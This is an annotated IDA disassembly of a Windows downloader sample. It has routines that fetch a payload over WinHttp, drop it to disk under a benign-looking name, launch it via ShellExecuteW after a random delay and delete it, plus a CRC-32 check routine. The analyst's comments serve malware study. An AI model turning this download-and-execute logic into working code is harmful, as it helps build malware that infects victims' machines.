.text:00401C4C 50                                push    eax
.text:00401C4D FF 15 FC 1E 40 00                 call    lpfwnsprintfW
.text:00401C53 8B 35 24 10 40 00                 mov     esi, lstrlenW
.text:00401C59 83 C4 20                          add     esp, 20h
.text:00401C5C FF 75 08                          push    [ebp+lpString]  ; lpString
.text:00401C5F FF D6                             call    esi ; lstrlenW
.text:00401C61 8B F8                             mov     edi, eax
.text:00401C63 8D 85 D4 FB FF FF                 lea     eax, [ebp+String]
.text:00401C69 50                                push    eax             ; lpString
.text:00401C6A FF D6                             call    esi ; lstrlenW
.text:00401C6C 33 F6                             xor     esi, esi
.text:00401C6E 56                                push    esi
.text:00401C6F 56                                push    esi
.text:00401C70 56                                push    esi
.text:00401C71 2B F8                             sub     edi, eax
.text:00401C73 56                                push    esi
.text:00401C74 33 C0                             xor     eax, eax
.text:00401C76 68 70 14 40 00                    push    offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 7.0; Wind"...
.text:00401C7B 66 89 84 7D DC FD+                mov     [ebp+edi*2+var_224], ax
.text:00401C83 C7 45 E8 00 33 00+                mov     [ebp+var_18], 3300h
.text:00401C8A FF 15 E0 1E 40 00                 call    lpfWinHttpOpen
.text:00401C90 3B C6                             cmp     eax, esi
.text:00401C92 0F 84 14 01 00 00                 jz      loc_401DAC
.text:00401C98 56                                push    esi
.text:00401C99 68 BB 01 00 00                    push    1BBh
.text:00401C9E 8D 8D DC FD FF FF                 lea     ecx, [ebp+var_224]
.text:00401CA4 51                                push    ecx
.text:00401CA5 50                                push    eax
.text:00401CA6 FF 15 0C 1F 40 00                 call    lpfWinHttpConnect
.text:00401CAC 3B C6                             cmp     eax, esi
.text:00401CAE 0F 84 F8 00 00 00                 jz      loc_401DAC
.text:00401CB4 68 00 00 80 00                    push    800000h
.text:00401CB9 56                                push    esi
.text:00401CBA 56                                push    esi
.text:00401CBB 56                                push    esi
.text:00401CBC 8D 8D D4 FB FF FF                 lea     ecx, [ebp+String]
.text:00401CC2 51                                push    ecx
.text:00401CC3 68 D8 14 40 00                    push    offset aGet     ; "GET"
.text:00401CC8 50                                push    eax
.text:00401CC9 FF 15 00 1F 40 00                 call    lpfWinHttpOpenRequest
.text:00401CCF 6A 04                             push    4
.text:00401CD1 5B                                pop     ebx
.text:00401CD2 8B F8                             mov     edi, eax
.text:00401CD4 53                                push    ebx
.text:00401CD5 8D 45 E8                          lea     eax, [ebp+var_18]
.text:00401CD8 50                                push    eax
.text:00401CD9 6A 1F                             push    1Fh
.text:00401CDB 57                                push    edi
.text:00401CDC 89 7D F4                          mov     [ebp+hRequest], edi
.text:00401CDF FF 15 18 1F 40 00                 call    lpfWinHttpSetOption
.text:00401CE5 53                                push    ebx
.text:00401CE6 8D 45 F0                          lea     eax, [ebp+var_10]
.text:00401CE9 50                                push    eax
.text:00401CEA 6A 3F                             push    3Fh
.text:00401CEC 57                                push    edi
.text:00401CED C7 45 F0 0A 00 00+                mov     [ebp+var_10], 0Ah
.text:00401CF4 89 75 E4                          mov     [ebp+var_1C], esi
.text:00401CF7 FF 15 18 1F 40 00                 call    lpfWinHttpSetOption
.text:00401CFD 53                                push    ebx
.text:00401CFE 8D 45 E4                          lea     eax, [ebp+var_1C]
.text:00401D01 50                                push    eax
.text:00401D02 6A 58                             push    58h
.text:00401D04 57                                push    edi
.text:00401D05 FF 15 18 1F 40 00                 call    lpfWinHttpSetOption
.text:00401D0B 3B FE                             cmp     edi, esi
.text:00401D0D 0F 84 99 00 00 00                 jz      loc_401DAC
.text:00401D13 56                                push    esi
.text:00401D14 56                                push    esi
.text:00401D15 56                                push    esi
.text:00401D16 56                                push    esi
.text:00401D17 56                                push    esi
.text:00401D18 56                                push    esi
.text:00401D19 57                                push    edi
.text:00401D1A FF 15 E4 1E 40 00                 call    WinHttpSendRequest
.text:00401D20 85 C0                             test    eax, eax
.text:00401D22 0F 84 84 00 00 00                 jz      loc_401DAC
.text:00401D28 56                                push    esi
.text:00401D29 57                                push    edi
.text:00401D2A FF 15 08 1F 40 00                 call    WinHttpReceiveResponse
.text:00401D30 85 C0                             test    eax, eax
.text:00401D32 74 78                             jz      short loc_401DAC
.text:00401D34 53                                push    ebx             ; flProtect
.text:00401D35 68 00 10 00 00                    push    1000h           ; flAllocationType
.text:00401D3A BB 00 00 20 00                    mov     ebx, 200000h
.text:00401D3F 53                                push    ebx             ; dwSize
.text:00401D40
.text:00401D40                   lNumberOfButesAvailable:                ; lpAddress
.text:00401D40 56                                push    esi
.text:00401D41 FF 15 34 10 40 00                 call    VirtualAlloc
.text:00401D47 89 45 FC                          mov     [ebp+lpAddress], eax
.text:00401D4A 33 FF                             xor     edi, edi
.text:00401D4C
.text:00401D4C                   loc_401D4C:                             ; CODE XREF: downloadPayload+17Bj
.text:00401D4C 8D 45 F8                          lea     eax, [ebp+lNumberOfBytesAvailable]
.text:00401D4F 50                                push    eax
.text:00401D50 FF 75 F4                          push    [ebp+hRequest]
.text:00401D53 89 75 F8                          mov     [ebp+lNumberOfBytesAvailable], esi ; On met le nombre d'octets a lire à 0 avant l'appel
.text:00401D56 FF 15 14 1F 40 00                 call    lpfWinHttpQueryDataAvailable
.text:00401D5C 8B 45 F8                          mov     eax, [ebp+lNumberOfBytesAvailable]
.text:00401D5F 8D 0C 38                          lea     ecx, [eax+edi]
.text:00401D62 3B CB                             cmp     ecx, ebx
.text:00401D64 77 32                             ja      short loc_401D98
.text:00401D66 3B C6                             cmp     eax, esi
.text:00401D68 76 20                             jbe     short loc_401D8A
.text:00401D6A 8D 4D EC                          lea     ecx, [ebp+lNumberOfBytesRead]
.text:00401D6D 51                                push    ecx
.text:00401D6E 50                                push    eax             ; EAX = dwNumberOfBytesToRead = lNumberOfBytesAvailable
.text:00401D6F 8B 45 FC                          mov     eax, [ebp+lpAddress]
.text:00401D72 03 C7                             add     eax, edi
.text:00401D74 50                                push    eax
.text:00401D75 FF 75 F4                          push    [ebp+hRequest]
.text:00401D78 FF 15 10 1F 40 00                 call    lpfWinHttpReadData ; On lit les données qui reviennent du GET
.text:00401D7E 85 C0                             test    eax, eax
.text:00401D80 74 03                             jz      short loc_401D85
.text:00401D82 03 7D EC                          add     edi, [ebp+lNumberOfBytesRead]
.text:00401D85
.text:00401D85                   loc_401D85:                             ; CODE XREF: downloadPayload+173j
.text:00401D85 39 75 F8                          cmp     [ebp+lNumberOfBytesAvailable], esi
.text:00401D88 77 C2                             ja      short loc_401D4C
.text:00401D8A
.text:00401D8A                   loc_401D8A:                             ; CODE XREF: downloadPayload+15Bj
.text:00401D8A 3B FE                             cmp     edi, esi
.text:00401D8C 76 1E                             jbe     short loc_401DAC
.text:00401D8E 8B 45 0C                          mov     eax, [ebp+arg_4]
.text:00401D91 89 38                             mov     [eax], edi
.text:00401D93 8B 45 FC                          mov     eax, [ebp+lpAddress]
.text:00401D96 EB 16                             jmp     short loc_401DAE
.text:00401D98                   ; ---------------------------------------------------------------------------
.text:00401D98
.text:00401D98                   loc_401D98:                             ; CODE XREF: downloadPayload+157j
.text:00401D98 39 75 FC                          cmp     [ebp+lpAddress], esi
.text:00401D9B 74 0F                             jz      short loc_401DAC
.text:00401D9D 68 00 80 00 00                    push    8000h           ; dwFreeType
.text:00401DA2 56                                push    esi             ; dwSize
.text:00401DA3 FF 75 FC                          push    [ebp+lpAddress] ; lpAddress
.text:00401DA6 FF 15 0C 10 40 00                 call    VirtualFree
.text:00401DAC
.text:00401DAC                   loc_401DAC:                             ; CODE XREF: downloadPayload+85j
.text:00401DAC                                                           ; downloadPayload+A1j ...
.text:00401DAC 33 C0                             xor     eax, eax
.text:00401DAE
.text:00401DAE                   loc_401DAE:                             ; CODE XREF: downloadPayload+189j
.text:00401DAE 5F                                pop     edi
.text:00401DAF 5E                                pop     esi
.text:00401DB0 5B                                pop     ebx
.text:00401DB1 C9                                leave
.text:00401DB2 C3                                retn
.text:00401DB2                   downloadPayload endp
.text:00401DB2
.text:00401DB3
.text:00401DB3                   ; =============== S U B R O U T I N E =======================================
.text:00401DB3
.text:00401DB3                   ; Attributes: bp-based frame
.text:00401DB3
.text:00401DB3                   ; int __cdecl executePayload(LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite)
.text:00401DB3                   executePayload  proc near               ; CODE XREF: start+2CFp
.text:00401DB3                   ; Writes the downloaded payload (lpBuffer, nNumberOfBytesToWrite bytes) to a new
.text:00401DB3                   ; file, launches that file through ShellExecuteW, waits 10 s, then deletes it.
.text:00401DB3                   ; Calling convention: cdecl (no stack cleanup before retn; same pattern as the
.text:00401DB3                   ; add esp, 20h below that cleans both callee argument lists at once).
.text:00401DB3                   ; Locals: var_20C  = name fragment produced by BuildCredibleFileName
.text:00401DB3                   ;         FileName = 0x200 WCHARs (0x400 bytes), "%s%s" of lpMemBlock2 + var_20C
.text:00401DB3                   ;         NumberOfBytesWritten = WriteFile out-parameter, never inspected
.text:00401DB3                   ; Registers: edi = 0, reused for every NULL argument; esi = hFile, later &Sleep;
.text:00401DB3                   ;            ebx = WriteFile result, pushed/popped around the Sleep call.
.text:00401DB3                   ; Return: no deliberate value is set; eax holds whatever the last API call left.
.text:00401DB3
.text:00401DB3                   FileName        = word ptr -60Ch
.text:00401DB3                   var_20C         = byte ptr -20Ch
.text:00401DB3                   NumberOfBytesWritten= dword ptr -4
.text:00401DB3                   lpBuffer        = dword ptr  8
.text:00401DB3                   nNumberOfBytesToWrite= dword ptr  0Ch
.text:00401DB3
.text:00401DB3 55                                push    ebp
.text:00401DB4 8B EC                             mov     ebp, esp
.text:00401DB6 81 EC 0C 06 00 00                 sub     esp, 60Ch       ; frame: FileName + var_20C + NumberOfBytesWritten
.text:00401DBC 56                                push    esi
.text:00401DBD 57                                push    edi
.text:00401DBE 6A 01                             push    1               ; BuildCredibleFileName arg 3 (meaning not visible here)
.text:00401DC0 8D 85 F4 FD FF FF                 lea     eax, [ebp+var_20C]
.text:00401DC6 6A 06                             push    6               ; BuildCredibleFileName arg 2 (meaning not visible here)
.text:00401DC8 50                                push    eax             ; arg 1: output buffer var_20C
.text:00401DC9 E8 ED F9 FF FF                    call    BuildCredibleFileName ; presumably fills var_20C with a benign-looking name - TODO confirm
.text:00401DCE 8D 85 F4 FD FF FF                 lea     eax, [ebp+var_20C]
.text:00401DD4 50                                push    eax             ; 2nd %s = var_20C
.text:00401DD5 FF 35 D8 1E 40 00                 push    lpMemBlock2     ; 1st %s: global written in start+8A; presumably a path prefix - TODO confirm
.text:00401DDB 8D 85 F4 F9 FF FF                 lea     eax, [ebp+FileName]
.text:00401DE1 68 D0 11 40 00                    push    offset aSS      ; "%s%s"
.text:00401DE6 68 00 02 00 00                    push    200h            ; cchDest in WCHARs (FileName is 0x400 bytes)
.text:00401DEB 50                                push    eax             ; pszDest = FileName
.text:00401DEC FF 15 FC 1E 40 00                 call    lpfwnsprintfW   ; FileName = lpMemBlock2 + var_20C
.text:00401DF2 83 C4 20                          add     esp, 20h        ; cdecl cleanup of both calls: 3 + 5 dwords
.text:00401DF5 33 FF                             xor     edi, edi        ; edi = 0 / NULL for the rest of the routine
.text:00401DF7 57                                push    edi             ; hTemplateFile
.text:00401DF8 68 80 00 00 00                    push    80h             ; dwFlagsAndAttributes = FILE_ATTRIBUTE_NORMAL
.text:00401DFD 6A 02                             push    2               ; dwCreationDisposition = CREATE_ALWAYS
.text:00401DFF 57                                push    edi             ; lpSecurityAttributes
.text:00401E00 6A 01                             push    1               ; dwShareMode = FILE_SHARE_READ
.text:00401E02 68 00 00 00 40                    push    40000000h       ; dwDesiredAccess = GENERIC_WRITE
.text:00401E07 8D 85 F4 F9 FF FF                 lea     eax, [ebp+FileName]
.text:00401E0D 50                                push    eax             ; lpFileName
.text:00401E0E FF 15 20 10 40 00                 call    CreateFileW
.text:00401E14 8B F0                             mov     esi, eax        ; esi = hFile
.text:00401E16 83 FE FF                          cmp     esi, 0FFFFFFFFh ; INVALID_HANDLE_VALUE?
.text:00401E19 74 61                             jz      short loc_401E7C ; could not create the file: leave, nothing written
.text:00401E1B 53                                push    ebx             ; callee-saved; ebx holds the WriteFile result below
.text:00401E1C 57                                push    edi             ; lpOverlapped
.text:00401E1D 8D 45 FC                          lea     eax, [ebp+NumberOfBytesWritten]
.text:00401E20 50                                push    eax             ; lpNumberOfBytesWritten
.text:00401E21 FF 75 0C                          push    [ebp+nNumberOfBytesToWrite] ; nNumberOfBytesToWrite
.text:00401E24 FF 75 08                          push    [ebp+lpBuffer]  ; lpBuffer
.text:00401E27 56                                push    esi             ; hFile
.text:00401E28 FF 15 10 10 40 00                 call    WriteFile
.text:00401E2E 56                                push    esi             ; hObject
.text:00401E2F 8B D8                             mov     ebx, eax        ; ebx = WriteFile result (BOOL)
.text:00401E31 FF 15 48 10 40 00                 call    CloseHandle
.text:00401E37 68 60 EA 00 00                    push    0EA60h          ; 60000: stack argument for randomizeEAX
.text:00401E3C B8 C0 D4 01 00                    mov     eax, 1D4C0h     ; 120000: register argument for randomizeEAX
.text:00401E41 E8 5B FA FF FF                    call    randomizeEAX    ; presumably eax = random delay derived from 60000/120000 - TODO confirm
.text:00401E46 8B 35 14 10 40 00                 mov     esi, Sleep      ; esi = &Sleep (hFile is already closed)
.text:00401E4C 59                                pop     ecx             ; discard randomizeEAX's stack argument
.text:00401E4D 50                                push    eax             ; dwMilliseconds = randomized delay
.text:00401E4E FF D6                             call    esi ; Sleep     ; delay before the payload is launched
.text:00401E50 3B DF                             cmp     ebx, edi        ; did WriteFile fail (ebx == 0)?
.text:00401E52 5B                                pop     ebx             ; restore callee-saved ebx (flags unaffected)
.text:00401E53 74 27                             jz      short loc_401E7C ; write failed: leave; file stays on disk, nothing launched
.text:00401E55 6A 0A                             push    0Ah             ; nShowCmd = 10 (SW_SHOWDEFAULT)
.text:00401E57 57                                push    edi             ; lpDirectory = NULL
.text:00401E58 57                                push    edi             ; lpParameters = NULL
.text:00401E59 8D 85 F4 F9 FF FF                 lea     eax, [ebp+FileName]
.text:00401E5F 50                                push    eax             ; lpFile = FileName
.text:00401E60 57                                push    edi             ; lpOperation = NULL (default verb)
.text:00401E61 57                                push    edi             ; hwnd = NULL
.text:00401E62 FF 15 DC 1E 40 00                 call    lpfShellExecuteW ; ======> launch the dropped payload
.text:00401E68 68 10 27 00 00                    push    2710h           ; dwMilliseconds = 10000 (10 s)
.text:00401E6D FF D6                             call    esi ; Sleep
.text:00401E6F 8D 85 F4 F9 FF FF                 lea     eax, [ebp+FileName]
.text:00401E75 50                                push    eax             ; lpFileName
.text:00401E76 FF 15 4C 10 40 00                 call    DeleteFileW     ; best-effort removal of the dropped file; result ignored
.text:00401E7C
.text:00401E7C                   loc_401E7C:                             ; CODE XREF: executePayload+66j
.text:00401E7C                                                           ; executePayload+A0j
.text:00401E7C 5F                                pop     edi
.text:00401E7D 5E                                pop     esi
.text:00401E7E C9                                leave
.text:00401E7F C3                                retn
.text:00401E7F                   executePayload  endp
.text:00401E7F
.text:00401E80
.text:00401E80                   ; =============== S U B R O U T I N E =======================================
.text:00401E80
.text:00401E80                   ; Attributes: bp-based frame
.text:00401E80
.text:00401E80                   computeChecksumPayload proc near        ; CODE XREF: dechiffreEtVerifiePayload+2Ap
.text:00401E80                   ; Bit-at-a-time CRC over lTailleBuffer bytes at lpBuffer.  The constants match
.text:00401E80                   ; the common reflected CRC-32: state = 0FFFFFFFFh at start, polynomial
.text:00401E80                   ; 0EDB88320h (applied as 0EDB8h:8320h to bx:ax), bitwise NOT at the end.
.text:00401E80                   ; Cross-check against a reference crc32 before relying on that identification.
.text:00401E80                   ; Stack args: lpBuffer = data, lTailleBuffer = byte count.  It must be > 0:
.text:00401E80                   ; the loop is dec/jnz, so 0 wraps to 2^32 iterations and reads far past the
.text:00401E80                   ; buffer - guard this when re-implementing for comparison.
.text:00401E80                   ; State layout: running CRC = dh:dl:ch:cl (upper 16 bits of ecx/edx are never
.text:00401E80                   ; used); bx:ax = per-byte table entry built by the 8-step inner loop.
.text:00401E80                   ; pusha/popa wraps the whole body, so the result is parked in var_4 (reserved
.text:00401E80                   ; by the push ecx below) and reloaded into eax after popa.  Returns CRC in eax.
.text:00401E80
.text:00401E80                   var_4           = dword ptr -4
.text:00401E80                   lpBuffer        = dword ptr  8
.text:00401E80                   lTailleBuffer   = dword ptr  0Ch
.text:00401E80
.text:00401E80 55                                push    ebp
.text:00401E81 8B EC                             mov     ebp, esp
.text:00401E83 51                                push    ecx             ; reserve var_4 (result slot)
.text:00401E84 53                                push    ebx             ; callee-saved (redundant with pusha below)
.text:00401E85 56                                push    esi
.text:00401E86 57                                push    edi
.text:00401E87 60                                pusha                   ; save all GPRs; popa at the end restores them
.text:00401E88 8B 75 08                          mov     esi, [ebp+lpBuffer] ; esi = data pointer
.text:00401E8B 8B 7D 0C                          mov     edi, [ebp+lTailleBuffer] ; edi = bytes remaining
.text:00401E8E FC                                cld                     ; lodsb must advance esi upward
.text:00401E8F 33 C9                             xor     ecx, ecx
.text:00401E91 49                                dec     ecx             ; ecx = 0FFFFFFFFh: initial CRC state
.text:00401E92 8B D1                             mov     edx, ecx        ; edx = 0FFFFFFFFh
.text:00401E94
.text:00401E94                   octetSuivant:                           ; CODE XREF: computeChecksumPayload+3Dj
.text:00401E94 33 C0                             xor     eax, eax        ; bx:ax = 0 (table-entry accumulator)
.text:00401E96 33 DB                             xor     ebx, ebx
.text:00401E98 AC                                lodsb                   ; AL = *esi++
.text:00401E99 32 C1                             xor     al, cl          ; al = (crc ^ byte) & 0FFh: table index
.text:00401E9B 8A CD                             mov     cl, ch          ; crc >>= 8: low 24 bits now in cl, ch, dl
.text:00401E9D 8A EA                             mov     ch, dl
.text:00401E9F 8A D6                             mov     dl, dh
.text:00401EA1 B6 08                             mov     dh, 8           ; dh = bit counter (top CRC byte is refilled from bh below)
.text:00401EA3
.text:00401EA3                   loc_401EA3:                             ; CODE XREF: computeChecksumPayload+36j
.text:00401EA3 66 D1 EB                          shr     bx, 1           ; bx:ax >>= 1, CF = bit shifted out
.text:00401EA6 66 D1 D8                          rcr     ax, 1
.text:00401EA9 73 09                             jnb     short loc_401EB4 ; bit was 0: no polynomial
.text:00401EAB 66 35 20 83                       xor     ax, 8320h       ; bx:ax ^= 0EDB88320h
.text:00401EAF 66 81 F3 B8 ED                    xor     bx, 0EDB8h
.text:00401EB4
.text:00401EB4                   loc_401EB4:                             ; CODE XREF: computeChecksumPayload+29j
.text:00401EB4 FE CE                             dec     dh              ; 8 bits per table entry
.text:00401EB6 75 EB                             jnz     short loc_401EA3
.text:00401EB8 33 C8                             xor     ecx, eax        ; cx ^= low half of the entry
.text:00401EBA 33 D3                             xor     edx, ebx        ; dl ^= bl; dh (now 0) = bh
.text:00401EBC 4F                                dec     edi             ; remaining byte count--
.text:00401EBD 75 D5                             jnz     short octetSuivant
.text:00401EBF F7 D2                             not     edx             ; final complement
.text:00401EC1 F7 D1                             not     ecx
.text:00401EC3 8B C2                             mov     eax, edx
.text:00401EC5 C1 C0 10                          rol     eax, 10h        ; dx into the upper half of eax
.text:00401EC8 66 8B C1                          mov     ax, cx          ; eax = dx:cx = ~crc
.text:00401ECB 89 45 FC                          mov     [ebp+var_4], eax ; park the result: popa would clobber eax
.text:00401ECE 61                                popa
.text:00401ECF 8B 45 FC                          mov     eax, [ebp+var_4] ; return value
.text:00401ED2 5F                                pop     edi
.text:00401ED3 5E                                pop     esi
.text:00401ED4 5B                                pop     ebx
.text:00401ED5 C9                                leave
.text:00401ED6 C3                                retn
.text:00401ED6                   computeChecksumPayload endp
.text:00401ED6
.text:00401ED6                   ; ---------------------------------------------------------------------------
.text:00401ED7 CC                                align 4
.text:00401ED8                   ; Writable globals living in the (RWX) code section.  The dd slots below are
.text:00401ED8                   ; filled at run time (write XREFs in start / LoadUsefullLibraries) and read by
.text:00401ED8                   ; the download/execute routines: three memory-block pointers plus function
.text:00401ED8                   ; pointers for APIs that are not in the static import table (presumably
.text:00401ED8                   ; resolved through the imported LoadLibraryA/GetProcAddress - TODO confirm).
.text:00401ED8                   ; LPWSTR lpMemBlock2
.text:00401ED8 00 00 00 00       lpMemBlock2     dd 0                    ; DATA XREF: start+8Aw
.text:00401ED8                                                           ; start+124r ...
.text:00401EDC 00 00 00 00       lpfShellExecuteW dd 0                   ; DATA XREF: start+22Dr
.text:00401EDC                                                           ; LoadUsefullLibraries+ADw ...
.text:00401EE0 00 00 00 00       lpfWinHttpOpen  dd 0                    ; DATA XREF: LoadUsefullLibraries+125w
.text:00401EE0                                                           ; downloadPayload+7Dr
.text:00401EE4 00 00 00 00       WinHttpSendRequest dd 0                 ; DATA XREF: LoadUsefullLibraries+F1w
.text:00401EE4                                                           ; downloadPayload+10Dr
.text:00401EE8 00 00 00 00       lpfWnsprintfA   dd 0                    ; DATA XREF: ErrorMsgBox+1Dr
.text:00401EE8                                                           ; LoadUsefullLibraries+83w
.text:00401EEC 00 00 00 00       lpMemBlock3     dd 0                    ; DATA XREF: start+98w
.text:00401EEC                                                           ; start+225r ...
.text:00401EF0 00 00 00 00       lpfSetupIterateCabinetW dd 0            ; DATA XREF: start+20Dr
.text:00401EF0                                                           ; LoadUsefullLibraries+A0w
.text:00401EF4 00 00 00 00       lpfStrStriW     dd 0                    ; DATA XREF: LoadUsefullLibraries+BDw
.text:00401EF4                                                           ; downloadPayload+14r
.text:00401EF8 00 00 00 00       lpMemBlock1     dd 0                    ; DATA XREF: start+7Dw
.text:00401EF8                                                           ; CallBackFileCAB+76r ...
.text:00401EFC 00 00 00 00       lpfwnsprintfW   dd 0                    ; DATA XREF: start+162r
.text:00401EFC                                                           ; BuildCredibleFileName+1Er ...
.text:00401F00 00 00 00 00       lpfWinHttpOpenRequest dd 0              ; DATA XREF: LoadUsefullLibraries+10Bw
.text:00401F00                                                           ; downloadPayload+BCr
.text:00401F04 00 00 00 00       lpfSystemFunction036 dd 0               ; DATA XREF: randomizeEAX+Dr
.text:00401F04                                                           ; LoadUsefullLibraries+CAw
.text:00401F08 00 00 00 00       WinHttpReceiveResponse dd 0             ; DATA XREF: LoadUsefullLibraries+E4w
.text:00401F08                                                           ; downloadPayload+11Dr
.text:00401F0C 00 00 00 00       lpfWinHttpConnect dd 0                  ; DATA XREF: LoadUsefullLibraries+118w
.text:00401F0C                                                           ; downloadPayload+99r
.text:00401F10 00 00 00 00       lpfWinHttpReadData dd 0                 ; DATA XREF: LoadUsefullLibraries+12Fw
.text:00401F10                                                           ; downloadPayload+16Br
.text:00401F14 00 00 00 00       lpfWinHttpQueryDataAvailable dd 0       ; DATA XREF: LoadUsefullLibraries+D7w
.text:00401F14                                                           ; downloadPayload+149r
.text:00401F18 00 00 00 00       lpfWinHttpSetOption dd 0                ; DATA XREF: LoadUsefullLibraries+FEw
.text:00401F18                                                           ; downloadPayload+D2r ...
.text:00401F1C                   ; The dwords from here on look like PE import-directory data that IDA did not
.text:00401F1C                   ; format: the values are RVAs inside this section (1F58h -> the table at
.text:00401F1C                   ; 00401F58, whose entries such as 1FB4h point at the hint/name records that
.text:00401F1C                   ; start at 00401FB4).  TODO confirm against the PE import directory.
.text:00401F1C 58 1F 00 00 00 00+                dd 1F58h, 2 dup(0)
.text:00401F28 E8 20 00 00 00 10+                dd 20E8h, 1000h, 1FACh, 2 dup(0)
.text:00401F3C 04 21 00 00 54 10+                dd 2104h, 1054h, 5 dup(0)
.text:00401F58 B4 1F 00 00 C2 1F+                dd 1FB4h, 1FC2h, 1FD2h, 1FE2h, 1FF0h, 1FFCh, 2004h, 2016h ; RVAs of the hint/name records below
.text:00401F58 00 00 D2 1F 00 00+                dd 202Ch, 203Ah, 2046h, 2056h, 2066h, 2078h, 2088h, 2098h
.text:00401F58 E2 1F 00 00 F0 1F+                dd 20A8h, 20BCh, 20CCh, 20DAh, 0
.text:00401FAC F6 20 00 00 00 00+                dd 20F6h, 0
.text:00401FB4                   ; Hint/name records (2-byte hint + ASCIIZ name) rendered as dwords; the byte
.text:00401FB4                   ; column spells the statically imported API names: ExitProcess, FindResourceA,
.text:00401FB4                   ; ..., CreateFileW, lstrlenW, GetTempPathW, GetLastError, GetProcAddress,
.text:00401FB4                   ; VirtualAlloc, ... and the DLL names near the end.
.text:00401FB4 04 01 45 78 69 74+                dd 78450104h, 72507469h, 7365636Fh, 1360073h, 646E6946h
.text:00401FB4 50 72 6F 63 65 73+                dd 6F736552h, 65637275h, 2F60041h, 64616F4Ch, 6F736552h
.text:00401FB4 73 00 36 01 46 69+                dd 65637275h, 4570000h, 74726956h, 466C6175h, 656572h
.text:00401FB4 6E 64 52 65 73 6F+                dd 7257048Dh, 46657469h, 656C69h, 6C530421h, 706565h, 69530420h
.text:00401FB4 75 72 63 65 41 00+                dd 666F657Ah, 6F736552h, 65637275h, 1F50000h
.text:00402018 47 65 74 4D 6F 64+aGetmodulefilen db 'GetModuleFileNameW',0
.text:0040202B 00                                align 4
.text:0040202C 7F 00 43 72 65 61+                dd 7243007Fh, 65746165h, 656C6946h, 4B60057h, 7274736Ch
.text:0040202C 74 65 46 69 6C 65+                dd 576E656Ch, 25B0000h, 54746547h, 50706D65h, 57687461h
.text:0040202C 57 00 B6 04 6C 73+                dd 1E60000h, 4C746547h, 45747361h, 726F7272h, 2200000h
.text:0040202C 74 72 6C 65 6E 57+                dd 50746547h, 41636F72h, 65726464h, 7373h, 69560454h, 61757472h
.text:0040202C 00 00 5B 02 47 65+                dd 6C6C416Ch, 636Fh, 6F4C02F1h, 694C6461h, 72617262h, 4179h
.text:0040202C 74 54 65 6D 70 50+                dd 6F4C0307h, 65526B63h, 72756F73h, 6563h, 654701F6h, 646F4D74h
.text:0040202C 61 74 68 57 00 00+                dd 48656C75h, 6C646E61h, 4165h, 7243008Bh, 65746165h, 6574754Dh
.text:0040202C E6 01 47 65 74 4C+                dd 4178h, 6C430043h, 4865736Fh, 6C646E61h, 0C30065h, 656C6544h
.text:0040202C 61 73 74 45 72 72+                dd 69466574h, 57656Ch, 4E52454Bh, 32334C45h, 6C6C642Eh
.text:0040202C 6F 72 00 00 20 02+                dd 1F80000h, 7373654Dh, 42656761h, 41786Fh, 52455355h
.text:0040202C 47 65 74 50 72 6F+                dd 642E3233h, 6C6Ch, 3Ch dup(0)
.text:0040202C 63 41 64 64 72 65+_text           ends
.text:0040202C 73 73 00 00 54 04+
.text:0040202C 56 69 72 74 75 61+
.text:0040202C 6C 41 6C 6C 6F 63+                end start